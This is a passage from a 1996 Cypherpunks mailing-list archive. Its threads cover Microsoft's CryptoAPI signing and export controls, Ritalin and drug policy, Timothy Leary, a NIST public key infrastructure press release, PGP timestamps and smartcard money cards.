domestic, US manufacturer of crypto software, because it still would have to 
export thousands or even million of copies of that software.

Also, another question occurred to me, today:  Let's suppose a piece of 
software was written which is designed to run on a Microsoft API, IF SIGNED. 
 If it isn't signed, it won't do anything.  Does that mean that it's legal 
to export, since it can't actually do any encryption?  If so, we may have 
the last laugh yet.


At 11:45 PM 7/9/96 -0700, Mike Ingle wrote:
>It's even easier than that. Remember, signatures are detachable from the 
>data. You import the software, MS signs it, you export the signature, and 
>reattach it to the software.
>
>						Mike
>
>> Couldn't somebody IMPORT a piece of encryption software, have it signed by 
>> Microsoft, then take the XOR of the signed and unsigned software and export 
>> it?  (It's not a tool capable of encryption...)
>> 
>> Or:  Microsoft presumably has foreign branches, or at least it could easily 
>> afford to set up one.  What's to stop Microsoft from signing foreign 
>> encryption software outside of the US?  The software is never exported 
>> (since it's already outside the country...), so there's no USA-law involv
>> ement.
>> Jim Bell
>> jimbell@pacifier.com
>> 
>
>
>
>
Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 11 Jul 1996 05:44:12 +0800
To: Enzo Michelangeli <enzo@ima.com>
Subject: Re: MSoft crypto API's
Message-ID: <199607101639.JAA02677@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:04 PM 7/10/96 +0800, Enzo Michelangeli wrote:

>> 
>> "  Microsoft's Crypto APIs will be available to third-party vendors
>> writing applications with embedded security. But the hardware or
>> software Crypto-engines for these applications will need to be
>> digitally signed by Microsoft before they will work with the APIs.
>> Under an unusual arrangement with the NSA, Microsoft will act as a
>> front man for the powerful U.S. spy agency, checking on whether the
>> vendors' products comply with U.S. export rules."


>More details are available from MS' web pages at:
>http://www.microsoft.com/win32dev/apiext/capi4.htm
>and:
>http://www.microsoft.com/intdev/security/cryptapi.htm
>
>I understand that NSA may have accepted the arrangement because only
>signed CSP's will be loaded under the CAPI, and MS will only sign them in
>Redmond. So, strong CSP modules developed outside the US will not be useable
>there because, once gone to Redmond, won't be re-exportable.

However, see my commentary to Mike Ingle.  If it's a foreign manufacturer 
we're talking about, then even though  the export of the signed package 
might arguably be illegal, ONLY ONE copy of it needs to be exported, 
possibly by some anonymous person who has nothing to do with either company. 
 The export will be illegal, but once exported any recipients would 
presumably be able to do anything they want with the program.


>The interesting part is that the basic, but crippled, CSP (PROV_RSA_FULL) 
>will be supplied for free by MS:

So they DIDN'T want their pieces of silver, huh?



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 11 Jul 1996 02:49:52 +0800
To: "Clay Olbon II" <cypherpunks@toad.com
Subject: Re: [RANT] Giving Mind Control Drugs to Children
Message-ID: <2.2.32.19960710134531.0082ca14@popserver.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:13 AM 7/10/96 -0400, Clay Olbon II wrote:
>First, a disclaimer:  I think adults should be allowed to ingest whatever
>substances they desire, and parents should be allowed to raise their kids
>without undue interference from the government.  
>
>Having said that, I think that the major issue with Ritalin is that parents
>are giving it to their children in significant percentages of the
>population. 

My real problem with the whole thing is that Ritalin is being prescribed by
government employees in most cases.  It thus constitutes behavior
modification of the population by the government which is certainly a human
rights violation.  It is arguably a First Amendment violation for the
government to chemically prevent you from expressing yourself in certain
ways.  They should not even be allowed to advocate such treatment.    

Obviously, I have no problem if private individuals acting alone or in
consultation with other private individuals decide to tank themselves up to
the gills (as long as they buy their own drogas) but government
"suggestions" for B-Mod should be very troubling to most of the readers of
this list.

Like religion, if you are crazy enough to ask your government what
mind-altering drugs you should take, the government should say -- "No
Comment.  That's up to you."

Government does not exist for the benefit of the governed.  Public school
Ritalin prescriptions do not exist for the benefit of the prescribees.

Once there was a 7-year-old girl.  The schools of Charlotte, NC diagnosed
her as suffering from minimal brain dysfunction (MBD) and prescribed
Ritalin.  Instead, her parents sent her to a non-government school in
another country where they did not employ Ritalin.  They substituted
teaching in its place.  Within a few years, she could decline Latin nouns
and everything.

DCF

"First God was the most important thing in men's lives so naturally men
killed each other for God.  Then the State became the most important thing
in men's lives so naturally men killed each other for the State.  Finally,
Health became the most important thing in men's lives so naturally men
killed each other for Health."     



 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 11 Jul 1996 03:40:06 +0800
To: "Clay Olbon II" <Clay.Olbon@dynetics.com>
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <AE0916E0-3A5976@193.239.225.200>
Message-ID: <199607101459.KAA16411@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Clay Olbon II" writes:
> While it is crucial for an adult to be able to function and maintain a job,
> is it really as important for a kid to be able to sit still in school?  

If he or she is going to learn anything, it is important to be able to
pay attention, yes.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 11 Jul 1996 07:32:38 +0800
To: Asgaard <cypherpunks@toad.com
Subject: Re: Mind-Altering Drugs
Message-ID: <ae09440f170210047276@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:48 PM 7/10/96, Asgaard wrote:

>Thinking of T. Leary in memoriam I looked around for the
>present psychedelic scene. Alta Vista sent me to where
>'everything' seems to connect ... Santa Cruz, Ca.

Guess where I live?

Leary came to a Cypherpunks party, a little over a year ago, at the home of
Doug Barnes. He was pretty frail-looking. I talked a bit to him, mostly
about "Gravity's Rainbow."

(Whose author lived anonymously near Santa Cruz, just over a ridge from me,
for almost 10 years.)

--Tim

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robin Powell <rpowell@algorithmics.com>
Date: Thu, 11 Jul 1996 04:47:35 +0800
To: Michael Tiemann <cypherpunks@toad.com
Subject: Re: what's up with GROW?
In-Reply-To: <96Jul10.112032edt.20485@janus.algorithmics.com>
Message-ID: <96Jul10.113046edt.20484@janus.algorithmics.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> In article <199607101517.IAA19065@cygnus.com>, Michael Tiemann <tiemann@cygnus.com> writes:

    > I didn't post there specifically, but John Gilmore may have done so a
    > while ago.  What specific problem are the cyberpunks trying to solve
    > that GROW would facilitate?

Sorry, I've just recieved so much complete incompetence with this
issue that talking to someone who was on the ball took some
adjusting.  Hope I wasn't too rude.

One of the main issue on cypherpunks right now (Black Unicorn did a
sort of "white paper" on it recently, as in two days ago) is
integrating cryptography with other apps, in particular WWW apps.  It
just seemed to me that if the kind of exstensibility which Emacs is
famous for was going to be a part of GROW, which apparently was the
attention, this would be a Good Thing for cryptography integration.  I
good point in this direction is that the most popular way of using PGP
with email is emacs-based (i.e. more people sign their posts to
cypherpunks using Mailcrypt, the emacs-PGP interface, then all other
signers combined, so it must be pretty easy to use).  I've used it,
and it's incredibly slick.  I had hopes the GROW to go as far as emacs
but with more network awareness.  Oh well.

This has been crossposted to cypherpunks, BTW.

-Robin

PS: You may want to go through and terf ALL the grow pages, not just
some of them.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Thu, 11 Jul 1996 04:40:30 +0800
To: bryce@digicash.com
Subject: Re: more about the usefulness of PGP
In-Reply-To: <199607101116.NAA17386@digicash.com>
Message-ID: <199607101544.LAA26047@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> authenticated message (I'm not sure if PGP's built-in timestamp
> is authenticated.  Anyone?), save the latest timestamp which you

Yes, the timestamp in a PGP signature is authenticated.  The hash is
run over the signature data.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 11 Jul 1996 07:57:45 +0800
To: Wei Dai <weidai@eskimo.com>
Subject: Re: Contracts, Responsibilities, and Drug-Dispensing
Message-ID: <199607101848.LAA28008@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  5:33 PM 7/9/96 -0700, Wei Dai wrote:
>On Tue, 9 Jul 1996, Bill Frantz wrote:
>
>> ObCrypto: When may a minor child say no to PAK (Parental Access to Keys)?
>
>Interesting threat model... What can one do in the total absense of
>physical security?  We've talked about mental cryptography before, but I
>think we agreed that it isn't very practical.  Perhaps security through
>obscurity is a better solution here, since many parents are less computer
>literate than their children.

Steganography still seems to be useful.  However, I don't think total
absence of physical security will last for long.  Soon school children will
be carrying their own portables, the way they now carry calculators.  They
will have private time alone with the hardware the same way their parents
will.  Parents and children divided into "armed camps" has always been a
lousy way to run a family.  Computers are just a new battle ground for
families that chose to run that way. 


-------------------------------------------------------------------------
Bill Frantz       | The Internet may fairly be | Periwinkle -- Consulting
(408)356-8506     | regarded as a never-ending | 16345 Englewood Ave.
frantz@netcom.com | worldwide conversation.    | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Mazieres <dm@amsterdam.lcs.mit.edu>
Date: Thu, 11 Jul 1996 04:58:05 +0800
To: "George Kuzmowycz" <gkuzmo@ix.netcom.com>
Subject: Re: MSoft crypto API's
In-Reply-To: <199607092319.QAA00934@dfw-ix2.ix.netcom.com>
Message-ID: <199607101610.MAA16287@extreme-discipline.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


What I don't underastand about this arangement is how other people are
supposed to develop crypto software under capi.  I mean, how is it
possible to develop a software package if you need to go get it signed
by microsoft every time you want to test it?

Or do US customers get versions of the OS that will crypto code
without verifying the signature?  Somehow I doubt that, though,
because then the NSA wouldn't be getting as much out of the deal.

David




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stig@hackvan.com (Stig)
Date: Thu, 11 Jul 1996 08:26:19 +0800
To: cypherpunks@toad.com
Subject: DES & IDEA built right into the Linux kernel...
Message-ID: <m0ue5GK-000HE6C@hackvan.com>
MIME-Version: 1.0
Content-Type: text/plain



Nicholas Leon <nicholas@binary9.net> has created tools that allow DES and
IDEA encryption at the device level for the Linux kernel.  Some of the
patches are in the 2.0.4 kernel, and the rest can be found at

    http://www.binary9.net/nicholas/linuxkernel/patches/

Stig




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Thu, 11 Jul 1996 06:53:31 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: [Poster] Add Uncle Sam to Your Circle of Friends and Family
Message-ID: <199607101748.NAA02968@nrk.com>
MIME-Version: 1.0
Content-Type: text


 Michael Froomkin writes:
 
 : http://www.rsa.com/rsa/gallery/circle1.gif

See the REST of that directory, also.......


-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "sfuze@tiac.net" <sfuze@sunspot.tiac.net>
Date: Thu, 11 Jul 1996 07:43:06 +0800
To: The Deviant <deviant@pooh-corner.com>
Subject: Re: July Freedom Forum Meeting
In-Reply-To: <Pine.LNX.3.94.960710064448.2225B-100000@switch.sp.org>
Message-ID: <Pine.SUN.3.91.960710141306.3406D-100000@sunspot.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


Or for that matter, did anyone hear that New Jersey, beginning in 1997, 
will fully have implemented a drivers license which encloses a computer 
chip intended to contain medical, legal, etc. backgrounds "and 
eventually" will be used to contain cash transactions, bus passes, etc.

For the 10% who know of it, let me know more.
For the rest of the list:  it's true.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Thu, 11 Jul 1996 10:16:55 +0800
To: cypherpunks@toad.com
Subject: Encryption tools at www.windows95.com
Message-ID: <2.2.32.19960710221817.00e08400@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


www.windows95.com now has a section for Encryption tools!

Check it out at:

        http://www.windows95.com/apps/encrypt.html

Some snameoil here, but they have the latest edition of s-tools, as well as
a number of PGP front ends listed.

---
|"Computers are Voodoo -- You just have to know where to stick the pins."|
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Thu, 11 Jul 1996 04:59:41 +0800
To: cypherpunks@toad.com
Subject: NIST on PKI
Message-ID: <199607101524.PAA10562@pipe1.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Business Wire, 9 July 1996: 
 
   Note To Editors: For more information on the NIST 
   initiative, please refer to the NIST press release: "NIST, 
   Industry Partners to Develop Specifications for Public Key 
   Infrastructure," July 9, 1996. 
 
   ----------  
 
   Certicom to Partner with NIST to Develop Specifications for 
   a Public Key Infrastructure; Certicom signs agreement with 
   NIST to contribute cryptographic expertise 
 
 
   Toronto -- Certicom Corp. a leading information security 
   company, today announced that it will participate in an 
   initiative by the U.S. Commerce Department's National 
   Institute of Standards and Technology (NIST) which will 
   lead to the development of the elements of a public key 
   infrastructure (PKI).  
 
   A PKI will enable individuals and organizations who have 
   never met to electronically send and receive documents 
   which have been digitally signed. 
 
   NIST announced today that it is partnering with several 
   companies who bring specialized experience in providing 
   products or services related to PKI components. 
 
   "Certicom is excited about the establishment of this PKI 
   project. It represents a proactive initiative by the 
   Commerce Department to develop standards based on existing 
   technology and commercial and government requirements by 
   soliciting the active participation of key industry 
   players," said Skip Hirsh, Director of U.S. Government 
   Marketing for Certicom. 
 
   "The strong leadership position taken by NIST will 
   accelerate the deployment of practical public key 
   infrastructures essential for the secure exchange of 
   electronic data." 
 
   "Certicom will contribute significant cryptographic 
   experience to the partnership, particularly with the 
   Elliptic Curve Cryptosystem (ECC) which is the most 
   efficient public key technology available," commented Gary 
   Hughes, president and CEO of Certicom. "ECC is a critical, 
   enabling technology for this NIST project because of its 
   efficiency in the high volume applications that are common  
   in PKIs." ... 
 
   Other partners that NIST has signed cooperative research 
   and development agreements (CRADAs) with include: AT&T 
   Government Markets, BBN Corp., Cylink Corp., DynCorp 
   Information & Technology Inc., Information Resource 
   Engineering Inc., Motorola, Northern Telecom Ltd. (Nortel), 
   SPYRUS, Inc. and VeriSign, Inc. 
 
   The goal of the partnership is to develop a minimum 
   interoperability specification for the technical components 
   of a PKI. The results will be shared with participating 
   companies, the appropriate standards-making bodies, federal 
   government agencies and industry organizations that are 
   working on aspects of PKI development. 
 
   A public key infrastructure relies on public key 
   cryptography in which each user has a key pair consisting 
   of a public and private key. The public key must be 
   digitally signed by a central authority to ensure its 
   authenticity. Digital signatures are cryptographic 
   techniques which are used for data integrity, 
   authentication and nonrepudiation. 
 
   The process of digitally signing public keys is known as 
   certification and is the main purpose of a public key 
   infrastructure. 
  
   Certicom expects to demonstrate the benefits ECC provides 
   to large-scale PKIs in which numerous users are signing and 
   verifying documents. 
 
   Elliptic Curve Cryptosystems have the highest strength per 
   bit of any known public key system, minimizing the 
   requirement for large key sizes. Cryptographic processes 
   based on ECC provide efficient computation techniques which 
   reduce communications and computation time, thereby 
   substantially reducing costs. 
 
   Certicom is a developer of information security products 
   and technologies and is the leader in Elliptic Curve 
   Cryptosystems, the world's most efficient public key 
   technology. The company specializes in applications where 
   the combination of cryptographic strength and high 
   efficiency are critical. Certicom's primary markets are in 
   wireless, smart cards, banking and electronic commerce over 
   the Internet. 
  
   Visit Certicom's home page at www.certicom.ca.  
 
   ----- 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Thu, 11 Jul 1996 09:35:55 +0800
To: John Young <jya@pipeline.com>
Subject: Re: Advances in Quantum crypto
In-Reply-To: <199607100137.BAA24375@pipe5.t1.usa.pipeline.com>
Message-ID: <Pine.LNX.3.94.960710165213.280C-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 10 Jul 1996, John Young wrote:

> On Jul 09, 1996 20:30:11, '"Mark M." <markm@voicenet.com>' wrote: 
>  
> >On Tue, 9 Jul 1996, Derek Bell wrote: 
> > 
> >> I see some Australian researchers have made an advance in quantum 
> >> crypto. 
> > 
> >What kinds of advances?  Last I heard, British Telecom was using quantum 
> >crypto on 10 kilometer fiber optic cables. 
>  
>  
> Yes, Derek and Mark, provide more detail, maybe source citations, on both
> these references, if you have them handy. 

I got the info w.r.t. British Telecom from Applied Cryptography.  There is
some interesting information on Quantum Crypto at BT Labs' page
(http://www.labs.bt.com/search.htm).  Run a search on "quantum cryptography".

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
"Freedom is the freedom to say that two plus two make four.  If that
is granted, all else follows."  --George Orwell, _1984_


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMeQYr7Zc+sv5siulAQFi+wQAiRvKgIaUb2LpU/tOrKFLlEW++q96Qb8p
UfExXBKk9XVvZb0Sl4TJwn37TMTFtgi+eAsEq7kazKq6eeqm1A9pna3d1tR8Gku7
WEIQTnisQTVrI6zfB4+2hGSd/av+yxwpBS8rdNYZGSWStdIWyxHpCdWxTw4nyJd7
FbQ8a5+YMeU=
=pVio
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 11 Jul 1996 09:32:52 +0800
To: JR@ns.cnb.uam.es
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <960710120333.21003a36@ROCK.CNB.UAM.ES>
Message-ID: <199607102103.RAA16916@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



JR@ns.cnb.uam.es writes:
> >No. I am proposing that people who wish to voluntarily take a medicine
> >that they feel improves their condition be left the hell alone by
> >busybodies like you, Tim May, et al.

> 	And I say I don't care what they do with their lifes as long as
> it doesn't affect mine. When someone smokes besides me and I have to breath
> the smoke, s/he's affecting my health. When someone takes antibiotics s/he
> doesn't need and selects resistant bacteria, that affects me.

Please inform me precisely how someone taking Ritalin impacts you.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Erle Greer <erleg@sdinter.net>
Date: Thu, 11 Jul 1996 10:22:33 +0800
To: cypherpunks@toad.com
Subject: Re: Word lists for passphrases > Apologies
Message-ID: <2.2.32.19960710220552.006aa224@pop3.sdinter.net>
MIME-Version: 1.0
Content-Type: text/plain


My apologies if you thought that I was pinpointing you, Mark, as an
individual.  You actually did a good job of proving to Ben that his example
words were useless in his argument.  One should gather actual data before
making statements.  God knows everyone else will evaluate data ten-times
more than the poster will.  I was merely trying to state that negative
comments (that have no direction or obvious support of the conversation) are
not in the interest of the entire group.  At most, they should be considered
private and voiced via email.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 11 Jul 1996 09:39:41 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: The Nature of the Cypherpunks Community and List
In-Reply-To: <ae08b00116021004aa01@[205.199.118.202]>
Message-ID: <Pine.SUN.3.94.960710170510.6843C-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 10 Jul 1996, Timothy C. May wrote:

> At 6:11 AM 7/10/96, Black Unicorn wrote:
> 
> >I wasn't touting conspiracy theories, just making what I thought was an
> >amusing observation.
> >
> >My apologies to Mr. Duvos.  I didn't at all mean to suggest he was in any
> >way responsible for this silliness, rather to point out the degree to
> >which the conversation has sunk into the sewer.
> 
> Please, Unicorn, people here are talking about what interests them, as
> directly demonstrated by the generation of articles and followups. If they
> were _more_ interested in discussing the IETF, or SFS, or Triple DES, for
> example, they _would_. (And at times they do, of course. All things have
> their times, and threads ebb and flow.)

Point taken.

> And, Unicorn, I recall you yourself generating several *dozen* long rants
> regarding Jim Bell, just a few months ago...

Touche.
 
> I suggest to all people who claim that the list has become "sewerpunks"
> that the best way to change the focus of the list is to write essays which
> generate responses (as you did, Unicorn, several days ago in your excellent
> "What remains to be done" piece). Leading by example, as opposed to
> "leading by kvetching."

I stand corrected, and agree.

[...]

> --Tim May

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Thu, 11 Jul 1996 12:19:18 +0800
To: cypherpunks@toad.com
Subject: Re: rsync and md4
In-Reply-To: <199607011419.KAA20986@jekyll.piermont.com>
Message-ID: <199607110013.RAA07968@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" <perry@piermont.com> writes:

 > From cypherpunks-errors@toad.com  Wed Jul 10 14:43:28 1996
 > Subject: Re: rsync and md4
 > Date: Mon, 01 Jul 1996 10:19:27 -0400

I think I've seen this message before.  Perry must be in reruns
for the summer.

Stay tuned for more of "The Best of Perry." :)

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Thu, 11 Jul 1996 09:28:52 +0800
To: ois-news@offshore.com.ai
Subject: Offshore is back in Old Ta
Message-ID: <Pine.LNX.3.91.960710171908.184A@offshore>
MIME-Version: 1.0
Content-Type: text/plain




They restored power to our usual address, "Old Ta", and we have
now moved back there.  So power was only out for 2 days.  Angalec
is doing a great job of restoring power.

Thanks again to Cable and Wireless for letting me setup there till
power was back here.

   --  Vince Cate
       Offshore Information Services 
       http://online.offshore.com.ai/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@sos.sll.se>
Date: Thu, 11 Jul 1996 04:46:47 +0800
To: cypherpunks@toad.com
Subject: Mind-Altering Drugs
Message-ID: <Pine.HPP.3.91.960710173116.4263A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


In the aftermath(?) of the Ritalin thread, let us remember
the Two Commandments of the late (recently) Timothy Leary:

(approximately)

1# Thou shalt not alter thy fellow man's conciousness with
   drugs against his will.

2# Thou shalt not prevent thy fellow man from altering his
   conciousness with drugs at his will.

Thinking of T. Leary in memoriam I looked around for the
present psychedelic scene. Alta Vista sent me to where
'everything' seems to connect ... Santa Cruz, Ca. 

http://island.org/


Asgaard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Thu, 11 Jul 1996 10:26:53 +0800
To: deviant@pooh-corner.com
Subject: Re: July Freedom Forum Meeting
Message-ID: <199607102217.SAA10666@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 10 Jul 96 at 7:06, The Deviant wrote:
[..]
> this SHOULD never happen, for the same reason that money cards (the one's
> with the chip embedded in the plastic) should never happen.
[..]
> ok, say I DID get a money card... here's the process that makes the
> encryption, and/or any other security, useless.
> 
> 1) get a bank loan, and transfer the $$ onto the card.. lets say
> $100,000...
> 
> 2) copy the chip.

Number (2) is not so easy with smartcard tech.

---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Thu, 11 Jul 1996 11:56:27 +0800
To: "geeman@best.com>
Subject: RE: FW: MSoft crypto API's
Message-ID: <199607102218.SAA10675@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 10 Jul 96 at 8:56, geeman@best.com wrote:

> but they don't sign the drivers.  they sign the CSP.  only.
 drivers are (can be) shipped as totally separate pieces of code.

You missed my point.  The crypto-service program they sign might be a 
DES library.  One implementation would be entirely in software; 
another would be a front-end interface with hardware (essentially a 
driver), perhaps as part of the kernel [Admittedly I'll have to 
re-read MS's specs].

So say you're a manufactuer or DES hardware... you sure would like to 
get that covetted 'Win95' logo on your package if you want to go 
mainstream.

Rob





---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 11 Jul 1996 10:04:06 +0800
To: cypherpunks@toad.com
Subject: Re: Mind-Altering Drugs
In-Reply-To: <ae09440f170210047276@[205.199.118.202]>
Message-ID: <v0300760bae09d8e9c878@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:24 PM -0400 7/10/96, Timothy C. May wrote:
> Leary came to a Cypherpunks party, a little over a year ago, at the home of
> Doug Barnes. He was pretty frail-looking. 

My favorite Leary quote:

    "Adulthood is terminal."

Mildly appropriate, given his death from prostate cancer(?).

When I was in college at Mizzou, he came to speak. I went up to him for an autograph, and the only thing I could find for him to sign was my "Introduction to Aristotle" book. We had a laugh about that.

I'd read about Gerry O'Neill before I saw Leary, but him showing slides of the inside of Bernal colonies got the, er, ball, rolling as far as my fascination with space development stuff is concerned.

Glad to know he was still as focused on the crackpot fringe :-) in his later years as he was in midlife.

Long may you wave, Dr. Leary...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Thu, 11 Jul 1996 08:24:05 +0800
To: Michael Helm <mike@fionn.lbl.gov>
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <199607101612.JAA19500@fionn.lbl.gov>
Message-ID: <Pine.LNX.3.94.960710190113.2660B-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 10 Jul 1996, Michael Helm wrote:

> Date: Wed, 10 Jul 1996 09:12:08 PDT
> From: Michael Helm <mike@fionn.lbl.gov>
> To: The Deviant <deviant@pooh-corner.com>, cypherpunks@toad.com,
>     JR@ns.cnb.uam.es, Clay Olbon II <Clay.Olbon@dynetics.com>
> Subject: Re: [RANT] Giving Mind Control Drugs to Children
> 

[stuff rm'd]

>
> Well, for the add child, they don't get a proper education by any
> measure, no matter what their symptoms are, without some kind of
> treatment.  This does not necessarily include drugs, of course, but
> some appear to benefit from it.  For the class, a hyperactive student
> -- ONE -- is more than sufficient to bring the house down & make it
> impossible for the rest of the class to learn anything much of the
> time.  As a taxpayer or parent with children in such a classroom
> you may find this a matter of some concern.
>

hrmm.. While what you say is SOMETIMES true, it usually is not.  For
instance, my older brother and I took American History in school the same
year.  I took it at a school for people with learning disabilites, he took
it in a perfectly normal public school.  EVERYBODY in my class had ADHD.
EVERYBODY.  He was the only person in his class who was afflicted with
this.  His teacher noted that he was one of the least trouble making
students.  My class got through the material, his class did not. 

See my point?

BTW, in case it makes any difference, he was on ritalin (spelling? I
dunno, neither of us can spell ;) at the time, and I was not, although
most of the people in my class were.

> 
> On Jul 10,  8:37am, The Deviant wrote:
> > hrmm.. I'm certified ADHD, and I drink more than LD50 Caffeine in cokes
> > per day.... what does that make me? ;)
> 
> Probably a good candidate for this year's tooth decay poster child %^)
> 

Hrmmm... doubtful... I've actually never had a cavaty... maybe the
gengavitis poster child, but...

 --Deviant


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMeP/TzAJap8fyDMVAQFfTQf8D0INraQLhKxLQNdiNMr5l91Xwf/NBhj0
Zz6262NtVgSoimS5gnhz60QtL2Klqwe+3BzKx1omjT/19DBMP7wY9tqcqc6A4EZz
A5/IYBxRJSDoC9g1ANCGK2TlXS5tEHKg1QQG5fBUOl/+8uDMq+dXLHnjqYwtLFuJ
Cg2K4f1D9InIsfsnSkjHUKDj+saaOvR/Gfj/Pdg6veg3R0Vku9oqgxMbJs5Uq0rm
uXjf8Eu4hzuVr2MZtHJC/ngPQoUnKnmgl7cVdMlvFK1D+q0rqrR32cLLIfjdXuu0
+VeRA1KFhGDSE612AzvomsIsxRJXWkkiRIGqdJxndLfiyYlBVqZYLw==
=Hdq2
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
